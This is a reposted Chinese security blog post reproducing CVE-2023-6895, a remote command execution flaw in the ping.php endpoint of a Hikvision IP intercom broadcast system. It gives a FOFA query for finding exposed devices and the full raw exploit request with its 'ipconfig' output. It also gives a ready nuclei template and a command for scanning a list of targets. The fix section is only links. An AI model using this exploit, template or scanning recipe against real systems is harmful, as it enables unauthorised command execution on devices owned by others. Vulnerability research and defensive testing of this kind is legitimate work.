【漏洞复现】CVE-2023-6895(附nuclei poc)

admin 2023年12月27日23:00:33评论141 views字数 2785阅读9分17秒阅读模式


使


有朋友说没收到推文,这个问题给公众号标星就能解决了。

【漏洞复现】CVE-2023-6895(附nuclei poc)


01

漏洞名称



海康威视IP网络对讲广播系统远程命令执行漏洞


02


漏洞影响


海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE

【漏洞复现】CVE-2023-6895(附nuclei poc)


03


漏洞描述


海康威视IP网络对讲广播系统,采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。它解决了传统对讲广播系统存在的传输距离有限、易受干扰等问题。海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE的/php/ping.php接口存在RCE漏洞。攻击者可以通过在受攻击系统上执行恶意命令,从而获取未授权的系统访问权限。


04


FOFA搜索语句

icon_hash="-1830859634"

【漏洞复现】CVE-2023-6895(附nuclei poc)


05


漏洞复现


向靶场发送如下数据包执行ipconfig命令

POST /php/ping.php HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Content-Length: 51Accept: application/json, text/javascript, */*; q=0.01Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: closeContent-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequest
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

响应内容如下

HTTP/1.1 200 OKConnection: closeContent-Length: 616Access-Control-Allow-Headers: X-Requested-WithAccess-Control-Allow-Methods: GET,POST,OPTIONSAccess-Control-Allow-Origin: *Content-Type: text/html;charset=utf-8Date: Tue, 26 Dec 2023 02:01:17 GMTServer: nginxStrict-Transport-Security: max-age=63072000X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=block
Microsoft Windows [版本 10.0.17763.4974](c) 2018 Microsoft Corporation。保留所有权利。
D:ICPASAppServer>ipconfig
Windows IP 配置

以太网适配器 以太网:
连接特定的 DNS 后缀 . . . . . . . : 本地链接 IPv6 地址. . . . . . . . : afd0::9xsd:82xs5:21xs:s84ty%15   IPv4 地址 . . . . . . . . . . . . : 192.168.0.7 子网掩码 . . . . . . . . . . . . : 255.255.240.0   默认网关. . . . . . . . . . . . . : afd0::edfa:dff:feff:ffff%15                                       192.168.0.1
D:ICPASAppServer>

漏洞复现成功



06


nuclei poc


poc文件内容如下

id: CVE-2023-6895
info: name: 海康威视IP网络对讲广播系统远程命令执行漏洞 author: fgz severity: critical description: 海康威视IP网络对讲广播系统,采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。它解决了传统对讲广播系统存在的传输距离有限、易受干扰等问题。海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE的/php/ping.php接口存在RCE漏洞。攻击者可以通过在受攻击系统上执行恶意命令,从而获取未授权的系统访问权限。 metadata: max-request: 1 fofa-query: icon_hash="-1830859634" verified: true
requests: - raw: - |+ POST /php/ping.php HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Connection: close jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

matchers: - type: dsl dsl: - "status_code == 200 && contains(body, 'IP')"

运行POC

nuclei.exe -l Hikvision-ip-spon.txt -t CVE-2023-6895.yaml -me result

【漏洞复现】CVE-2023-6895(附nuclei poc)



07


修复建议


官方补丁链接如下:

https://www.spon.com.cn/https://www.cnnvd.org.cn/home/loopholehttps://www.cnnvd.org.cn/home/loopholehttps://www.cnnvd.org.cn/home/loophole


原文始发于微信公众号(AI与网安):【漏洞复现】CVE-2023-6895(附nuclei poc)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月27日23:00:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】CVE-2023-6895(附nuclei poc)https://cn-sec.com/archives/2339000.html

发表评论

匿名网友 填写信息